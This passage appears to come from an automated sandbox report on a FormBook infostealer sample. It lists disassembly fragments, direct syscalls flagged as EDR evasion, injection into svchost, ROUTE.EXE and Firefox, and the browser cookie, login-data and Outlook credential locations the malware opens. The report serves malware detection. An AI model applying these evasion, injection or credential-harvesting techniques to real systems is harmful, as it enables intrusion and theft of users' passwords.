                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]1_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]1_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]1_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]1_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]1_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]1_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]1_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]1_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]1_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]1_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]1_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]1_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]1_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]1_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]1_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]1_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]1_2_03D04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]1_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]1_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]1_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]1_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]1_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]1_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]1_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]1_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]1_2_03D008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]1_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]1_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]1_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]1_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]1_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]1_2_03CBE872
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DD0B62
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DA2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DA2622
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D9083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D9083F
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D909D5 SetUnhandledExceptionFilter,0_2_00D909D5
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D90C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D90C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ROUTE.EXEThread register set: target process: 8136Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ROUTE.EXEThread APC queued: target process: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31B4008Jump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74735590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00DD1201
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DB2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DB2BA5
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DDB226 SendInput,keybd_event,0_2_00DDB226
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DF22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00DF22DA
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\qlG7x91YXH.exe"Jump to behavior
                Source: C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00DD0B62
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DD1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00DD1663
                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: qlG7x91YXH.exe, sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: sUcUmdUxGfN.exe, 00000005.00000002.3015420587.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000000.2189260322.0000000001470000.00000002.00000001.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338021850.00000000018C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D90698 cpuid 0_2_00D90698
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DE8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00DE8195
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DCD27A GetUserNameW,0_2_00DCD27A
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DABB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00DABB6F
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: qlG7x91YXH.exeBinary or memory string: WIN_81
                Source: qlG7x91YXH.exeBinary or memory string: WIN_XP
